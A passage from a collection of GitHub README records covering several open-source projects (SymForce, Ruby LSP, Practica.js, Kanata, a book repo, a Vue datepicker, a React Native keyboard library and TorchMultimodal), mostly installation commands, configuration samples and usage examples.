piece may also be used independently. The optimization machinery can work with handwritten functions, and the symbolic math and code generation is useful outside of any optimization context. To learn more, visit the SymForce tutorials here . Build from Source For best results, you should build from the latest tagged release . You can also build from main , or from another branch, but everything is less guaranteed to work. SymForce requires Python 3.8 or later. The build is currently tested on Linux and macOS, SymForce on Windows is untested (see #145 ). We strongly suggest creating a virtual python environment. Install the gmp package with one of: bash apt install libgmp-dev # Ubuntu brew install gmp # Mac conda install -c conda-forge gmp # Conda SymForce contains both C++ and Python code. The C++ code is built using CMake. You can build the package either by calling pip, or by calling CMake directly. If building with pip , this will call CMake under the hood, and run the same CMake build for the C++ components. If you encounter build issues, please file an issue . Build with pip If you just want to build and install SymForce without repeatedly modifying the source, the recommended way to do this is with pip. From the symforce directory: bash pip install . If you're modifying the SymForce Python sources, you can do an editable install instead. This will let you modify the Python components of SymForce without reinstalling. If you're going to repeatedly modify the C++ sources, you should instead build with CMake directly as described below . From the symforce directory: bash pip install -e . You should then verify your installation . Note: pip install . will not install pinned versions of SymForce's dependencies, it'll install any compatible versions. 
It also won't install all packages required to run all of the SymForce tests and build all of the targets (e.g. building the docs or running the linters). If you want all packages required for that, you should pip install .[dev] instead (or one of the other groups of extra requirements in our setup.py ). If you additionally want pinned versions of our dependencies, which are the exact versions guaranteed by CI to pass all of our tests, you can install them with pip install -r dev_requirements.txt . Note: Editable installs as root with the system python on Ubuntu (and other Debian derivatives) are broken on setuptools<64.0.0 . This is a bug in Debian , not something in SymForce that we can fix. If this is your situation, either use a virtual environment, upgrade setuptools to a version >=64.0.0 , or use a different installation method. Build with CMake If you'll be modifying the C++ parts of SymForce, you should build with CMake directly instead - this method will not install SymForce into your Python environment, so you'll need to add it to your PYTHONPATH separately. Install python requirements:
```bash
pip install -r dev_requirements.txt
```
Build SymForce (requires C++14 or later):
```bash
mkdir build
cd build
cmake ..
make -j $(nproc)
```
You'll then need to add SymForce (along with gen/python and third_party/skymarshal within symforce and lcmtypes/python2.7 within the build directory) to your PYTHONPATH in order to use them, for example:
```bash
export PYTHONPATH="$PYTHONPATH:/path/to/symforce:/path/to/symforce/build/lcmtypes/python2.7"
```
If you want to install SymForce to use its C++ libraries in another CMake project, you can do that with:
```bash
make install
```
SymForce does not currently integrate with CMake's find_package (see #209 ), so if you do this you currently need to add its libraries as link dependencies in your CMake project manually. Verify your installation
```python
>>> import symforce
>>> symforce.get_symbolic_api()
'symengine'
>>> from symforce import cc_sym
```
If you see 'sympy' here instead of 'symengine' , or can't import cc_sym , your installation is probably broken and you should submit an issue . License SymForce is released under the Apache 2.0 license. See the LICENSE file for more information. Sponsors SymForce is developed and maintained by Skydio . It is released as a free and open-source library for the robotics community. Contributing While SymForce already powers tens of thousands of robots at Skydio, the public library is new and we are releasing it in beta stage. This is just the beginning, and we are excited for engagement from the community. Thank you for helping us develop SymForce! The best way to get started is to file issues for bugs or desired features. There are many features we're excited to add to SymForce and would love to see contributed by the community. Most are outlined in the issues, but some major desired contributions are: Add more backend languages, such as TypeScript and GLSL/HLSL, and improvements to the experimental CUDA and PyTorch backends Support for WebAssembly compilation More Lie group types, in particular Sim(3) Support for constraints in our optimizer Integration with ISPC Windows and conda packages;Fast symbolic computation, code generation, and nonlinear optimization for robotics;robotics,python,cpp,code-generation,optimization,symbolic-computation,slam,computer-vision,motion-planning,structure-from-motion
symforce-org/symforce
Shopify/ruby-lsp;Ruby LSP The Ruby LSP is an implementation of the language server protocol for Ruby, used to provide rich features in editors. It is a part of a wider goal to provide a state-of-the-art experience to Ruby developers using modern standards for cross-editor features, documentation and debugging. Want to discuss Ruby developer experience? Consider joining the public Ruby DX Slack workspace . Features The Ruby LSP features include Semantic highlighting Symbol search and code outline RuboCop errors and warnings (diagnostics) Format on save (with RuboCop or Syntax Tree) Format on type Debugging support Running and debugging tests through VS Code's UI Go to definition for classes, modules, constants and required files Showing documentation on hover for classes, modules and constants Completion for classes, modules, constants and require paths Fuzzy search classes, modules and constants anywhere in the project and its dependencies (workspace symbol) Adding method support for definition, completion, hover and workspace symbol is partially supported, but not yet complete. Follow progress in https://github.com/Shopify/ruby-lsp/issues/899 See complete information about features here . If you experience issues, please see the troubleshooting guide . Usage With VS Code If using VS Code, all you have to do is install the Ruby LSP extension to get the extra features in the editor. Do not install the ruby-lsp gem manually. For more information on using and configuring the extension, see vscode/README.md . With other editors See editors for community instructions on setting up the Ruby LSP, which currently includes Emacs, Neovim, Sublime Text, and Zed. The gem can be installed by doing
```shell
gem install ruby-lsp
```
and the language server can be launched running ruby-lsp (without bundle exec in order to properly hook into your project's dependencies). Documentation See the documentation for more in-depth details about the supported features . For creating rich themes for Ruby using the semantic highlighting information, see the semantic highlighting documentation . Configuring code indexing By default, the Ruby LSP indexes all Ruby files defined in the current project and all of its dependencies, including default gems, except for: gems that only appear under the :development group, and all Ruby files under test/**/*.rb. By creating a .index.yml file, these configurations can be overridden and tuned. Note that indexing-dependent behavior, such as definition, hover, completion or workspace symbol, will be impacted by the configurations placed here.
```yaml
# Exclude files based on a given pattern. Often used to exclude test files or fixtures
excluded_patterns:
  - "**/spec/**/*.rb"

# Include files based on a given pattern. Can be used to index Ruby files that use different extensions
included_patterns:
  - "**/bin/*"

# Exclude gems by name. If a gem is never referenced in the project's code and is only used as a tool,
# excluding it will speed up indexing and reduce the amount of results in features like definition or completion
excluded_gems:
  - rubocop
  - pathname

# Include gems by name. Normally used to include development gems that are excluded by default
included_gems:
  - prism
```
Addons The Ruby LSP provides an addon system that allows other gems to enhance the base functionality with more editor features. This is the mechanism that powers addons like Ruby LSP Rails Ruby LSP RSpec Ruby LSP rubyfmt Other community driven addons can be found in rubygems by searching for the ruby-lsp prefix.
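To give a rough idea of the shape of an addon, here is a sketch of an entry point. Treat the base class and hook names used here (::RubyLsp::Addon, activate, deactivate, name) as assumptions to verify against the addons documentation linked below, since the exact interface depends on your ruby-lsp version.
```ruby
# A rough sketch of an addon entry point; hook names and signatures are
# assumptions - verify them against the addons documentation.
module RubyLsp
  module MyGem
    class Addon < ::RubyLsp::Addon
      # Invoked when the language server boots and activates addons
      def activate(global_state, message_queue)
        @message_queue = message_queue
      end

      # Invoked on shutdown so the addon can clean up after itself
      def deactivate
      end

      # The addon name, used for logging and error reporting
      def name
        "Ruby LSP My Gem"
      end
    end
  end
end
```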
For instructions on how to create addons, see the addons documentation . Learn More RubyConf 2022: Improving the development experience with language servers ( Vinicius Stock ) Remote Ruby: Ruby Language Server with Vinicius Stock RubyKaigi 2023: Code indexing - How language servers understand our code ( Vinicius Stock ) Contributing Bug reports and pull requests are welcome on GitHub at https://github.com/Shopify/ruby-lsp. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct. If you wish to contribute, see CONTRIBUTING for development instructions and check out our pinned roadmap issue for a list of tasks to get started. License The gem is available as open source under the terms of the MIT License .;An opinionated language server for Ruby;lsp,ruby
Shopify/ruby-lsp
practicajs/practica;Generate a Node.js app that is packed with best practices AND simplicity in mind. Based on our repo Node.js best practices (96,100 stars) Twitter | Documentation site A One Paragraph Overview Although Node.js has great frameworks 💚, they were never meant to be dev & production ready immediately (e.g., no architecture layers, DB schemas, Dockerfile, etc.). Practica.js aims to bridge the gap. Based on your preferred framework, we generate example code that demonstrates a full Microservice flow, from API to DB, that is packed with good practices. For example, we include a battle-tested error handler, sanitized API response, hardened dockerfile, thoughtful 3-tier folder structure, great testing templates with DB, and more. This saves a great deal of time and can prevent painful mistakes. All decisions made are neatly and thoughtfully documented . We strive to keep things as simple and standard as possible and base our work on the popular guide: Node.js Best Practices 1 min video 👇, ensure audio is activated https://user-images.githubusercontent.com/8571500/170464232-43355e43-98cf-4069-b9fc-6bc303a39efc.mp4 Table of Contents Super-Quick Setup Our Philosophies and Unique Values Practices and Features The People Behind Practica.js Our best practices guide, 78,000 stars ✨ Contribution guide Documentation site YouTube Coming Soon: Example Applications Express, PostgreSQL, with common best practices Express, mongo-db, with common best practices Express, PostgreSQL, with all best practices (advanced) Minimal with project setup configuration only More Flavours Fastify, PostgreSQL Fastify, mongo-db Generate Your Own Interactively More coming soon Super-Quick Setup Run Practica.js from the Command Line Run the practica CLI and generate our default app (you can customize it using different flags): bash npx @practica/create-node-app immediate --install-dependencies ✨ And you're done! That's it, the code's all been generated. Our default setup includes Fastify for the web layer, Sequelize for data access, and PostgreSQL. Prefer Express and Prisma? Just pass the right flags to the CLI: bash npx @practica/create-node-app immediate --install-dependencies --web-framework=express --orm=prisma Prefer another DB? We use standard ORMs, read their docs and switch DB. This is your code, do whatever you like Start the Project bash cd {your chosen folder name} npm install Then choose whether to start the app: bash npm run or run the tests: bash npm test Pretty straightforward, right? You just got a Node.js Monorepo solution with one example component/Microservice and multiple libraries. Based on this hardened solution you can build a robust application. The example component/Microservice is located under: {your chosen folder name}/services/order-service . This is where you'll find the API and a good spot to start your journey from. Next Steps ✅ Start coding. The code we generate is minimal by design and based on known libraries. This should help you get up to speed quickly. ✅ Read our 'coding with practica' guide ✅ Master it by reading our docs at https://practica.dev . Our Philosophies and Unique Values 1. Best Practices on top of known Node.js frameworks We don't re-invent the wheel. Rather, we use your favorite framework and empower it with structure and real examples. With a single command you can get an Express/Fastify-based codebase with many thoughtful best practices inside.
2. Simplicity, how Node.js was intended Keeping it simple, flat, and based on native Node/JS capabilities is part of this project's DNA. We believe that too many abstractions, high complexity or fancy language features can quickly become a stumbling block for the team. To name a few examples, our code flow is flat with almost no level of indirection, no DI - it's just simple functions calling other functions. Although using TypeScript, almost no features are being used besides types; for modularization we simply use... Node.js modules. 3. Supports many technologies and frameworks Good Practices and Simplicity is the name of the game with Practica. There is no need to narrow our code to a specific framework or database. We aim to support the popular Node.js frameworks and data access approaches. Practices and Features We apply dozens of practices and optimizations. You can opt in or out for most of these features using option flags on our CLI. The following table lists just a few examples out of the full list of features we provide .

| Feature | Explanation | Flag | Docs |
| ----------- | --------------- | -------- | -------- |
| Monorepo setup | Generates two components (e.g., Microservices) in a single repository with interactions between the two | --mr, --monorepo | Docs here |
| Output escaping and sanitizing | Clean-out outgoing responses from potential HTML security risks like XSS | --oe, --output-escape | Docs here |
| Integration (component) testing | Generates full-blown component/integration tests setup including DB | --t, --tests | Docs here |
| Unique request ID (Correlation ID) | Generates module that creates a unique correlation/request ID for every incoming request. This is available for any other object during the request life-span. Internally it uses Node's built-in AsyncLocalStorage (a minimal sketch of this pattern appears after this section) | --coi, --correlation-id | Docs here |
| Dockerfile | Generates dockerfile that embodies >20 best practices | --df, --docker-file | Docs here |
| Strong-schema configuration | A configuration module that dynamically loads run-time configuration keys and includes a strong schema so it can fail fast | Built-in with basic app | Docs here |

📗 See our full list of features here The People Behind Practica.js Steering Committee Practica is a community-driven open-source project. It's being led voluntarily by engineers from many different companies. These companies are just a few who encourage their engineers to contribute and keep this project moving. 💚 A Nasdaq 100 company, a world leader in design software Leader IoT provider, part of 'Cox Communication', the 3rd largest cable company in the US Core Team Yoni Goldberg Independent Node.js consultant Michael Solomon Node.js lead Raz Luvaton Node.js developer Daniel Gluskin Node.js lead Ariel Steiner Node.js developer Tomer Kohane Frontend geek Dan Goldberg Node.js lead Ron Dahan Node.js expert Partners These companies are keen on continuous improvement and their engineers have been known to contribute during work hours.
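To make the correlation-ID feature from the table above concrete, here is a minimal sketch of the underlying pattern using Node's built-in AsyncLocalStorage. This is illustrative only, not Practica's actual module; the server, function names, and header choice here are assumptions.
```typescript
// A minimal sketch of the correlation-ID pattern, assuming a plain Node.js
// HTTP server; Practica's generated module differs, but the core idea is
// AsyncLocalStorage carrying a per-request ID through the whole call stack.
import { AsyncLocalStorage } from 'node:async_hooks';
import { createServer } from 'node:http';
import { randomUUID } from 'node:crypto';

const requestContext = new AsyncLocalStorage<{ correlationId: string }>();

// Any function deep in the call stack can read the current request's ID
// without it being passed explicitly through every layer.
function getCorrelationId(): string | undefined {
  return requestContext.getStore()?.correlationId;
}

createServer((req, res) => {
  const correlationId =
    (req.headers['x-correlation-id'] as string) ?? randomUUID();
  // Everything invoked (sync or async) inside this callback sees the same store.
  requestContext.run({ correlationId }, () => {
    console.log(`[${getCorrelationId()}] ${req.method} ${req.url}`);
    res.end('ok');
  });
}).listen(3000);
```
The benefit of this design is that loggers, error handlers, and DB layers can all stamp their output with the same request ID without threading an argument through every function signature.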
Our Amazing Contributors 💚 A million thanks to these great people who have contributed code to our project: Brian Clark 💻 Raz Luvaton 🖋 💻 Michael Solomon 💻 itainoam 💻 📆 shanizlo 💻 Ron Dahan 💻 AlonK 💻 Jose Luis Alvarez Herrera 🖋 💻 reinaldo-calderon-team 💻 KarelVerschraegen 📖 Daniel Morrison 🖋 Sean Lowe 💡 🖋 idobetesh 💻 Alejandra Acosta 💻 adandanielteamint 🖋 Rashad Majali 💻 yohai zvuloon 🖋 Yonatan Kra 🖋 Yoni Rapoport 🖋 perilevy 💻 ToMer-K 💻 hen arbel 💻 Mojca Ostir 💻 evbambly 🖋 Amir Adar 🖋 Sebastien Vaucouleur 🖋 Harry Dobrev 💻 Bassam Ismail 📖 Marcos Molina 💻 Isen Kasa 💻 Vishal Sharma 💻;Node.js solution starter boilerplate that is production-ready, packed with ✅ best practices and built with simplicity in mind;nodejs,best-practices,express,fastify,postgresql,mongodb,boilerplate,starter-kit,hacktoberfest
practicajs/practica
jtroo/kanata;Kanata Improve your keyboard comfort What does this do? This is a cross-platform software keyboard remapper for Linux, macOS and Windows. A short summary of the features: multiple layers of key functionality advanced key behaviour customization (e.g. tap-hold, macros, unicode) cross-platform human readable configuration file Check out the examples directory and the online simulator . To see all of the features, see the configuration guide . The configuration guide aims to be up-to-date with main and may have features not in your version. See the applicable link in the releases page . The most similar project is kmonad , which served as the inspiration for kanata. Here's a comparison document . You can see a list of known issues here . Demo video Showcase of multi-layer functionality (30s, 1.7 MB) . Why is this useful? Imagine if, instead of pressing Shift to type uppercase letters, we had giant keyboards with separate keys for lowercase and uppercase letters. I hope we can all agree: that would be a terrible user experience! A way to think of how Shift keys work is that they switch your input to another layer of functionality where you now type uppercase letters and symbols instead of lowercase letters and numbers. What kanata allows you to do is take this alternate layer concept that Shift keys have and apply it to any key. You can then customize what those layers do to suit your exact needs and workflows. Usage Running kanata currently does not start it in a background process. You will need to keep the window that starts kanata running to keep kanata active. Some tips for running kanata in the background: Windows: https://github.com/jtroo/kanata/discussions/193 Linux: https://github.com/jtroo/kanata/discussions/130 Run from tray icon: kanata-tray Pre-built executables See the releases page for executables and instructions. Build it yourself This project uses the latest Rust stable toolchain. If you installed the Rust toolchain using rustup , e.g. by using the instructions from the official website , you can get the latest stable toolchain with rustup update stable . Instructions Using `cargo install`:
```
cargo install kanata

# On Linux and macOS, this may not work without `sudo`, see below
kanata --cfg <your_configuration_file>
```
Build and run yourself in Linux:
```
git clone https://github.com/jtroo/kanata && cd kanata
cargo build   # --release optional, not really perf sensitive

# sudo is used because kanata opens /dev/ files
#
# See below if you want to avoid needing sudo:
# https://github.com/jtroo/kanata/wiki/Avoid-using-sudo-on-Linux
sudo target/debug/kanata --cfg <your_configuration_file>
```
Build and run yourself in Windows:
```
git clone https://github.com/jtroo/kanata; cd kanata
cargo build   # --release optional, not really perf sensitive
target\debug\kanata --cfg <your_configuration_file>
```
Build and run yourself in macOS: For macOS version 11 and newer: Install the [Karabiner VirtualHiDDevice Driver](https://github.com/pqrs-org/Karabiner-DriverKit-VirtualHIDDevice/blob/main/dist/Karabiner-DriverKit-VirtualHIDDevice-3.1.0.pkg). To activate it: `/Applications/.Karabiner-VirtualHIDDevice-Manager.app/Contents/MacOS/Karabiner-VirtualHIDDevice-Manager activate` For macOS version 10 and older: Install the [Karabiner kernel extension](https://github.com/pqrs-org/Karabiner-VirtualHIDDevice).
```
git clone https://github.com/jtroo/kanata && cd kanata
cargo build   # --release optional, not really perf sensitive

# sudo is needed to gain permission to intercept the keyboard
sudo target/debug/kanata --cfg <your_configuration_file>
```
The full configuration guide is [found here](./docs/config.adoc).
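As a first taste of the format before looking at the samples below, here is a minimal sketch of a configuration. It is illustrative only; check the configuration guide above for exact key names and action syntax (defsrc, defalias, deflayer, and tap-hold are assumed here).
```
;; A minimal configuration sketch (illustrative; see the configuration guide
;; for exact syntax). defsrc lists the physical keys being intercepted, and
;; each deflayer assigns them new meanings in the same order.
(defsrc
  caps a s d f j k l
)

(defalias
  ;; tap for escape, hold for left control
  escctrl (tap-hold 200 200 esc lctl)
)

(deflayer base
  @escctrl a s d f j k l
)
```
With this sketch, tapping caps sends escape while holding it acts as left control, and all other listed keys keep their normal behavior.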
Sample configuration files are found in [cfg_samples](./cfg_samples). The [simple.kbd](./cfg_samples/simple.kbd) file contains a basic configuration file that is hopefully easy to understand but does not contain all features. The `kanata.kbd` contains an example of all features with documentation. The release assets also have a `kanata.kbd` file that is tested to work with that release. All key names can be found in the [keys module](./src/keys/mod.rs), and you can also define your own key names. Feature flags When either building yourself or using cargo install , you can add feature flags that enable functionality that is turned off by default. Instructions If you want to enable the `cmd` actions, add the flag `--features cmd`. For example:
```
cargo build --release --features cmd
cargo install --features cmd
```
On Windows, if you want to compile a binary that uses the Interception driver, you should add the flag `--features interception_driver`. For example:
```
cargo build --release --features interception_driver
cargo install --features interception_driver
```
To combine multiple flags, use a single `--features` flag and use a comma to separate the features. For example:
```
cargo build --release --features cmd,interception_driver
cargo install --features cmd,interception_driver
```
Other installation methods Notable features Human readable configuration file. Minimal example Full guide Simple example with explanations All features showcase Live reloading of the configuration for easy testing of your changes. Multiple layers of key functionality Advanced actions such as tap-hold, unicode output, dynamic and static macros Vim-like leader sequences to execute other actions Optionally run a TCP server to interact with other programs Other programs can respond to layer changes or trigger layer changes Interception driver support (use kanata_wintercept.exe ) Note that this issue exists, which is outside the control of this project: https://github.com/oblitum/Interception/issues/25 Contributing Contributions are welcome! Unless explicitly stated otherwise, your contributions to kanata will be made under the LGPL-3.0-only * license. Some directories are exceptions: - keyberon : MIT License - interception : MIT or Apache-2.0 Licenses Here's a basic low-effort design doc of kanata How you can help Try it out and let me know what you think. Feel free to file an issue or start a discussion. Usability issues and unhelpful error messages are considered bugs that should be fixed. If you encounter any, I would be thankful if you file an issue. Browse the open issues and help out if you are able and/or would like to. If you want to try contributing, feel free to ping jtroo for some pointers. If you know anything about writing a keyboard driver for Windows, starting an open-source alternative to the Interception driver would be lovely. Community projects related to kanata vscode-kanata : Language support for kanata configuration files in VS Code komokana : Automatic application-aware layer switching for komorebi (Windows) kanata-tray : Control kanata from a tray icon Application-aware layer switching: qanata (Linux) kanawin (Windows) window_tools (Windows) What does the name mean? I wanted a "k" word since this relates to keyboards. According to Wikipedia, kanata is an indigenous Iroquoian word meaning "village" or "settlement" and is the origin of Canada's name. There's also PPT✧. Motivation TLDR: QMK features but for any keyboard, not just fancy mechanical ones.
Long version I have a few keyboards that run [QMK](https://docs.qmk.fm/#/). QMK allows the user to customize the functionality of their keyboard to their heart's content. One great use case of QMK is its ability to map keys so that they overlap with the home row keys but are accessible on another layer. I won't comment on productivity, but I find this greatly helps with my keyboard comfort. For example, these keys are on the right side of the keyboard:
```
7 8 9
u i o
j k l
m , .
```
On one layer I have arrow keys in the same position, and on another layer I have a numpad.
```
arrows:    numpad:
- - -      7 8 9
- ↑ -      4 5 6
← ↓ →      1 2 3
- - -      0 * .
```
One could add as many customizations as one likes to improve comfort, speed, etc. Personally my main motivator is comfort due to a repetitive strain injury in the past. However, QMK doesn't run everywhere. In fact, it doesn't run on **most** hardware you can get. You can't get it to run on a laptop keyboard or any mainstream office keyboard. I believe that the comfort and empowerment QMK provides should be available to anyone with a computer on their existing hardware, instead of having to purchase an enthusiast mechanical keyboard (which are admittedly very nice — I own a few — but can be costly). The best alternative solution that I found for keyboards that don't run QMK was [kmonad](https://github.com/kmonad/kmonad). This is an excellent project and I recommend it if you want to try something similar. The reason for this project's existence is that kmonad is written in Haskell and I have no idea how to begin contributing to a Haskell project. From an outsider's perspective I think Haskell is a great language but I really can't wrap my head around it. And there are a few [outstanding issues](./docs/kmonad_comparison.md) at the time of writing that make kmonad suboptimal for my personal workflows. This project is written in Rust because Rust is my favourite programming language and the prior work of the awesome [keyberon crate](https://github.com/TeXitoi/keyberon) exists. Similar Projects kmonad : The inspiration for kanata (Linux, Windows, Mac) QMK : Open source keyboard firmware keyberon : Rust #[no_std] library intended for keyboard firmware ktrl : Linux-only keyboard customizer with layers, a TCP server, and audio support kbremap : Windows-only keyboard customizer with layers and unicode xcape : Linux-only tap-hold modifiers karabiner-elements : Mac-only keyboard customizer capsicain : Windows-only key remapper with driver-level key interception keyd : Linux-only key remapper very similar to QMK, kmonad, and kanata xremap : Linux-only application-aware key remapper inspired more by Emacs key sequences vs. QMK layers/Vim modes keymapper : Context-aware cross-platform key remapper with a different transformation model (Linux, Windows, Mac) Why the list? While kanata is the best tool for some, it may not be the best tool for you. I'm happy to introduce you to tools that may better suit your needs. This list is also useful as reference/inspiration for functionality that could be added to kanata. Donations/Support? The author (jtroo) will not accept monetary donations for work on kanata. Please instead donate your time and/or money to charity. Some links are below. These links are provided for learning and as interesting reads. They are not an endorsement.
https://www.effectivealtruism.org/ https://www.givewell.org/;Improve keyboard comfort and usability with advanced customization;keyboard,rust,cross-platform,linux,windows,interception-driver,keyboard-layout,mouse,mouse-emulation,macos
jtroo/kanata
probml/pml2-book;"Probabilistic Machine Learning: Advanced Topics" by Kevin Murphy. This repo is used to store the PDF for book 2 (see the "releases" tab on the RHS). This lets me keep track of downloads and issues separately from book 1 .;Probabilistic Machine Learning: Advanced Topics;[]
probml/pml2-book
Vuepic/vue-datepicker;@vuepic/vue-datepicker The most complete datepicker solution for Vue 3 DOCUMENTATION StackBlitz Playground Features Single date picker Range date picker Time picker Month picker Year picker Quarter picker Week picker Multiple dates select Multiple calendars Text input UTC support Timezones Locale support Week numbers Custom v-model Dark and light theme SSR support Highly configurable Accessible Included type definitions Install
```shell
# npm
npm install @vuepic/vue-datepicker

# yarn
yarn add @vuepic/vue-datepicker

# pnpm
pnpm add @vuepic/vue-datepicker

# bun
bun add @vuepic/vue-datepicker
```
Import and register component Global
```js
import { createApp } from 'vue';
import App from './App.vue';

import VueDatePicker from '@vuepic/vue-datepicker';
import '@vuepic/vue-datepicker/dist/main.css';

const app = createApp(App);
app.component('VueDatePicker', VueDatePicker);
```
Local
```vue
<!-- A minimal local-registration sketch -->
<script setup>
import VueDatePicker from '@vuepic/vue-datepicker';
import '@vuepic/vue-datepicker/dist/main.css';
</script>

<template>
  <VueDatePicker />
</template>
```
Supporting the project As you may know, maintaining an open-source project is a very time-consuming job. Your support is very appreciated ❤️ Please ⭐️ this repository if you like the component! You can also make a financial contribution by sponsoring this project or making a one-time donation. Become a sponsor Special thanks to our sponsors 🙏 Contributors Thanks to all people who contributed to the project 🙏 Versioning This project follows the SemVer specification License Copyright © 2021-present Vuepic MIT;Datepicker component for Vue 3;vue,datetime,timepicker,datepicker,daterangepicker,datetimepicker,vue-datepicker,vue3,vue-datetimepicker
Vuepic/vue-datepicker
kirillzyusko/react-native-keyboard-controller;react-native-keyboard-controller Keyboard manager which works in an identical way on both iOS and Android. Demonstration Key features mapping keyboard movement to animated values 😎 missing keyboardWillShow / keyboardWillHide events are available on Android 😍 module for changing soft input mode on Android 🤔 reanimated support 🚀 interactive keyboard dismissing 👆📱 prebuilt components ( KeyboardStickyView , KeyboardAwareScrollView , re-worked KeyboardAvoidingView ) 📚 KeyboardToolbar with easy behavior customization of previous , next and done buttons in the keyboard toolbar 📐 easy focused input information retrieval 📝 🔮 works with any navigation library 🧭 and more is coming... Stay tuned! 😊 Installation Install the react-native-keyboard-controller package from npm:
```shell
# yarn
yarn add react-native-keyboard-controller

# or npm
npm install react-native-keyboard-controller --save
```
Documentation Check out our dedicated documentation page for info about this library, API reference and more: https://kirillzyusko.github.io/react-native-keyboard-controller/ Contributing See the contributing guide to learn how to contribute to the repository and the development workflow. License MIT;Keyboard manager which works in identical way on both iOS and Android;animation,keyboard,react-native,android,ios,focused-input,avoiding-view,keyboard-toolbar
kirillzyusko/react-native-keyboard-controller
facebookresearch/multimodal;TorchMultimodal (Beta Release) Models | Example scripts | Getting started | Code overview | Installation | Contributing | License Introduction TorchMultimodal is a PyTorch library for training state-of-the-art multimodal multi-task models at scale, including both content understanding and generative models. TorchMultimodal contains: - A repository of modular and composable building blocks (fusion layers, loss functions, datasets and utilities). - A collection of common multimodal model classes built up from said building blocks, with pretrained weights for canonical configurations. - A set of examples that show how to combine these building blocks with components and common infrastructure from across the PyTorch ecosystem to replicate state-of-the-art models published in the literature. These examples should serve as baselines for ongoing research in the field, as well as a starting point for future work. Models TorchMultimodal contains a number of models, including
- ALBEF: model class , paper
- BLIP-2: model class , paper
- CLIP: model class , paper
- CoCa: model class , paper
- DALL-E 2: model , paper
- FLAVA: model class , paper
- MAE/Audio MAE: model class , MAE paper , Audio MAE paper
- MDETR: model class , paper

Example scripts In addition to the above models, we provide example scripts for training, fine-tuning, and evaluation of models on popular multimodal tasks. Examples can be found under examples/ and include

| Model | Supported Tasks |
| :--------------------------------------: | :----------------------: |
| ALBEF | Retrieval, Visual Question Answering |
| DDPM | Training and Inference (notebook) |
| FLAVA | Pretraining, Fine-tuning, Zero-shot |
| MDETR | Phrase grounding, Visual Question Answering |
| MUGEN | Text-to-video retrieval, Text-to-video generation |
| Omnivore | Pre-training, Evaluation |

Getting started Below we give minimal examples of how you can write a simple training or zero-shot evaluation script using components from TorchMultimodal.
FLAVA zero-shot example
```python
import torch
from PIL import Image
from torchmultimodal.models.flava.model import flava_model
from torchmultimodal.transforms.bert_text_transform import BertTextTransform
from torchmultimodal.transforms.flava_transform import FLAVAImageTransform


# Define helper function for zero-shot prediction
def predict(zero_shot_model, image, labels):
    zero_shot_model.eval()
    with torch.no_grad():
        image = image_transform(image)["image"].unsqueeze(0)
        texts = text_transform(labels)
        _, image_features = zero_shot_model.encode_image(image, projection=True)
        _, text_features = zero_shot_model.encode_text(texts, projection=True)
        scores = image_features @ text_features.t()
        probs = torch.nn.Softmax(dim=-1)(scores)
        label = labels[torch.argmax(probs)]
        print(
            "Label probabilities: ",
            {labels[i]: probs[:, i] for i in range(len(labels))},
        )
        print(f"Predicted label: {label}")


image_transform = FLAVAImageTransform(is_train=False)
text_transform = BertTextTransform()
zero_shot_model = flava_model(pretrained=True)
img = Image.open("my_image.jpg")  # point to your own image
predict(zero_shot_model, img, ["dog", "cat", "house"])

# Example output:
# Label probabilities:  {'dog': tensor([0.80590]), 'cat': tensor([0.0971]), 'house': tensor([0.0970])}
# Predicted label: dog
```
MAE training example
```python
import torch
from torch.utils.data import DataLoader
from torchmultimodal.models.masked_auto_encoder.model import vit_l_16_image_mae
from torchmultimodal.models.masked_auto_encoder.utils import (
    CosineWithWarmupAndLRScaling,
)
from torchmultimodal.modules.losses.reconstruction_loss import ReconstructionLoss
from torchmultimodal.transforms.mae_transform import ImagePretrainTransform

mae_transform = ImagePretrainTransform()
dataset = MyDatasetClass(transforms=mae_transform)  # you should define this
dataloader = DataLoader(dataset, batch_size=8)

# Instantiate model and loss
mae_model = vit_l_16_image_mae()
mae_loss = ReconstructionLoss()

# Define optimizer and lr scheduler
optimizer = torch.optim.AdamW(mae_model.parameters())
lr_scheduler = CosineWithWarmupAndLRScaling(
    optimizer, max_iters=1000, warmup_iters=100  # you should set these
)

# Train one epoch
for batch in dataloader:
    optimizer.zero_grad()  # clear gradients left over from the previous step
    model_out = mae_model(batch["images"])
    loss = mae_loss(model_out.decoder_pred, model_out.label_patches, model_out.mask)
    loss.backward()
    optimizer.step()
    lr_scheduler.step()
```
Code overview torchmultimodal/diffusion_labs diffusion_labs contains components for building diffusion models. For more details on these components, see diffusion_labs/README.md . torchmultimodal/models Look here for model classes as well as any other modeling code specific to a given architecture. E.g. the directory torchmultimodal/models/blip2 contains modeling components specific to BLIP-2. torchmultimodal/modules Look here for common generic building blocks that can be stitched together to build a new architecture. This includes layers like codebooks , patch embeddings , or transformer encoder/decoders , losses like contrastive loss with temperature or reconstruction loss , encoders like ViT and BERT , and fusion modules like Deep Set fusion . torchmultimodal/transforms Look here for common data transforms from popular models, e.g. CLIP , FLAVA , and MAE . Installation TorchMultimodal requires Python >= 3.8. The library can be installed with or without CUDA support. The following assumes conda is installed.
Prerequisites Install conda environment
```
conda create -n torch-multimodal python=<python_version>
conda activate torch-multimodal
```
Install pytorch, torchvision, and torchaudio. See PyTorch documentation .
```
# Use the current CUDA version as seen here
# Select the nightly Pytorch build, Linux as the OS, and conda. Pick the most recent CUDA version.
conda install pytorch torchvision torchaudio pytorch-cuda=<cuda_version> -c pytorch-nightly -c nvidia

# For CPU-only install
conda install pytorch torchvision torchaudio cpuonly -c pytorch-nightly
```
Install from binaries Nightly binary on Linux for Python 3.8 and 3.9 can be installed via pip wheels. For now we only support the Linux platform through PyPI . python -m pip install torchmultimodal-nightly Building from Source Alternatively, you can also build from our source code and run our examples :
```
git clone --recursive https://github.com/facebookresearch/multimodal.git multimodal
cd multimodal
pip install -e .
```
For developers please follow the development installation . License TorchMultimodal is BSD licensed, as found in the LICENSE file.;TorchMultimodal is a PyTorch library for training state-of-the-art multimodal multi-task models at scale.;[]
facebookresearch/multimodal
